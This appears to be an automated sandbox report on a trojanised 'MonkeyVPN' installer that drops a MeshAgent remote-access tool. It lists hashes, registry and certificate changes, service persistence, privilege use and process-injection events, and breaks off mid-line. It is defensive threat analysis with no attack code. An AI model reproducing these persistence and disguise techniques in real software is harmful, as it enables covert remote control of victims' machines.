Analysis
-
max time kernel
123s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 19:27
Behavioral task
behavioral1
Sample
MonkeyVPN1.1.2.exe
Resource
win7-20240903-en
General
-
Target
MonkeyVPN1.1.2.exe
-
Size
43.2MB
-
MD5
f3696254e6992deccbff25ab0af2ebc8
-
SHA1
54ca8798c4e4eb8a455769ab706cc3de7fa1917d
-
SHA256
ce92f52a6bc1f39cb592766cbf17e5bed63fa59eda5c88a961517ba3da5b49d3
-
SHA512
fc58762f3436e0c32d57ffdba6f3fc3eeb176a52eed93c41b3c867fd24e5eb431bb46a2e89c375598ae37c83ec726dc74b1a61ee18e5c583e339ad4a3de1e8e7
-
SSDEEP
786432:W+ZLhn5jG92pLhIvTIUBEiigLdfKRo8lS1h2a35VdZn33DmzBt/vWJZlZj1SXgfK:WULhn5jGWVIbIUBUsxMlmV3nHnnD6TX5
Malware Config
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\naver\naver.exe family_meshagent -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 32 2368 powershell.exe 36 2368 powershell.exe 37 2368 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 1148 powershell.exe 1408 powershell.exe 400 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
naver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" naver.exe -
Executes dropped EXE 3 IoCs
Processes:
start.exenaver.exenaver.exepid process 2892 start.exe 4420 naver.exe 2768 naver.exe -
Loads dropped DLL 2 IoCs
Processes:
MsiExec.exepid process 376 MsiExec.exe 376 MsiExec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Drops file in System32 directory 64 IoCs
Processes:
naver.exedescription ioc process File opened for modification C:\Windows\System32\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\shell32.pdb naver.exe File opened for modification C:\Windows\System32\dll\shell32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\shcore.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys naver.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\41FE14C119D3C07EA85E1CEDBAB8709DA86438A2 naver.exe File opened for modification C:\Windows\System32\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\dll\win32u.pdb naver.exe File opened for modification C:\Windows\System32\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\combase.pdb naver.exe File opened for modification C:\Windows\System32\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\user32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\dll\bcryptprimitives.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\970DDF9FE996C7243EB028B43E8395C0364FCB5D naver.exe File opened for modification C:\Windows\System32\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0D6BBDF75FD2F46E3045527C44F6C37D2DFD063F naver.exe -
Processes:
resource yara_rule behavioral2/memory/492-1-0x0000000000560000-0x00000000036FF000-memory.dmp upx behavioral2/memory/492-38-0x0000000000560000-0x00000000036FF000-memory.dmp upx behavioral2/memory/492-48-0x0000000000560000-0x00000000036FF000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
start.exemsiexec.exeMsiExec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language start.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exenaver.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716797190449477" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naver.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naver.exe -
Processes:
MonkeyVPN1.1.2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 MonkeyVPN1.1.2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 MonkeyVPN1.1.2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 MonkeyVPN1.1.2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exechrome.exepid process 1408 powershell.exe 2368 powershell.exe 1408 powershell.exe 2368 powershell.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe 4956 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeShutdownPrivilege 1180 msiexec.exe Token: SeIncreaseQuotaPrivilege 1180 msiexec.exe Token: SeSecurityPrivilege 652 msiexec.exe Token: SeCreateTokenPrivilege 1180 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1180 msiexec.exe Token: SeLockMemoryPrivilege 1180 msiexec.exe Token: SeIncreaseQuotaPrivilege 1180 msiexec.exe Token: SeMachineAccountPrivilege 1180 msiexec.exe Token: SeTcbPrivilege 1180 msiexec.exe Token: SeSecurityPrivilege 1180 msiexec.exe Token: SeTakeOwnershipPrivilege 1180 msiexec.exe Token: SeLoadDriverPrivilege 1180 msiexec.exe Token: SeSystemProfilePrivilege 1180 msiexec.exe Token: SeSystemtimePrivilege 1180 msiexec.exe Token: SeProfSingleProcessPrivilege 1180 msiexec.exe Token: SeIncBasePriorityPrivilege 1180 msiexec.exe Token: SeCreatePagefilePrivilege 1180 msiexec.exe Token: SeCreatePermanentPrivilege 1180 msiexec.exe Token: SeBackupPrivilege 1180 msiexec.exe Token: SeRestorePrivilege 1180 msiexec.exe Token: SeShutdownPrivilege 1180 msiexec.exe Token: SeDebugPrivilege 1180 msiexec.exe Token: SeAuditPrivilege 1180 msiexec.exe Token: SeSystemEnvironmentPrivilege 1180 msiexec.exe Token: SeChangeNotifyPrivilege 1180 msiexec.exe Token: SeRemoteShutdownPrivilege 1180 msiexec.exe Token: SeUndockPrivilege 1180 msiexec.exe Token: SeSyncAgentPrivilege 1180 msiexec.exe Token: SeEnableDelegationPrivilege 1180 msiexec.exe Token: SeManageVolumePrivilege 1180 msiexec.exe Token: SeImpersonatePrivilege 1180 msiexec.exe Token: SeCreateGlobalPrivilege 1180 msiexec.exe Token: SeCreateTokenPrivilege 1180 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1180 msiexec.exe Token: SeLockMemoryPrivilege 1180 msiexec.exe Token: SeIncreaseQuotaPrivilege 1180 msiexec.exe Token: SeMachineAccountPrivilege 1180 msiexec.exe Token: SeTcbPrivilege 1180 msiexec.exe Token: SeSecurityPrivilege 1180 msiexec.exe Token: SeTakeOwnershipPrivilege 1180 msiexec.exe Token: SeLoadDriverPrivilege 1180 msiexec.exe Token: SeSystemProfilePrivilege 1180 msiexec.exe Token: SeSystemtimePrivilege 1180 msiexec.exe Token: SeProfSingleProcessPrivilege 1180 msiexec.exe Token: SeIncBasePriorityPrivilege 1180 msiexec.exe Token: SeCreatePagefilePrivilege 1180 msiexec.exe Token: SeCreatePermanentPrivilege 1180 msiexec.exe Token: SeBackupPrivilege 1180 msiexec.exe Token: SeRestorePrivilege 1180 msiexec.exe Token: SeShutdownPrivilege 1180 msiexec.exe Token: SeDebugPrivilege 1180 msiexec.exe Token: SeAuditPrivilege 1180 msiexec.exe Token: SeSystemEnvironmentPrivilege 1180 msiexec.exe Token: SeChangeNotifyPrivilege 1180 msiexec.exe Token: SeRemoteShutdownPrivilege 1180 msiexec.exe Token: SeUndockPrivilege 1180 msiexec.exe Token: SeSyncAgentPrivilege 1180 msiexec.exe Token: SeEnableDelegationPrivilege 1180 msiexec.exe Token: SeManageVolumePrivilege 1180 msiexec.exe Token: SeImpersonatePrivilege 1180 msiexec.exe Token: SeCreateGlobalPrivilege 1180 msiexec.exe Token: SeCreateTokenPrivilege 1180 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
msiexec.exepid process 1180 msiexec.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
MonkeyVPN1.1.2.execmd.exestart.exemsiexec.exepowershell.exechrome.exemsedge.exenaver.exedescription pid process target process PID 492 wrote to memory of 2368 492 MonkeyVPN1.1.2.exe powershell.exe PID 492 wrote to memory of 2368 492 MonkeyVPN1.1.2.exe powershell.exe PID 492 wrote to memory of 1408 492 MonkeyVPN1.1.2.exe powershell.exe PID 492 wrote to memory of 1408 492 MonkeyVPN1.1.2.exe powershell.exe PID 492 wrote to memory of 1604 492 MonkeyVPN1.1.2.exe cmd.exe PID 492 wrote to memory of 1604 492 MonkeyVPN1.1.2.exe cmd.exe PID 1604 wrote to memory of 2892 1604 cmd.exe start.exe PID 1604 wrote to memory of 2892 1604 cmd.exe start.exe PID 1604 wrote to memory of 2892 1604 cmd.exe start.exe PID 2892 wrote to memory of 1180 2892 start.exe msiexec.exe PID 2892 wrote to memory of 1180 2892 start.exe msiexec.exe PID 2892 wrote to memory of 1180 2892 start.exe msiexec.exe PID 652 wrote to memory of 376 652 msiexec.exe MsiExec.exe PID 652 wrote to memory of 376 652 msiexec.exe MsiExec.exe PID 652 wrote to memory of 376 652 msiexec.exe MsiExec.exe PID 2368 wrote to memory of 4956 2368 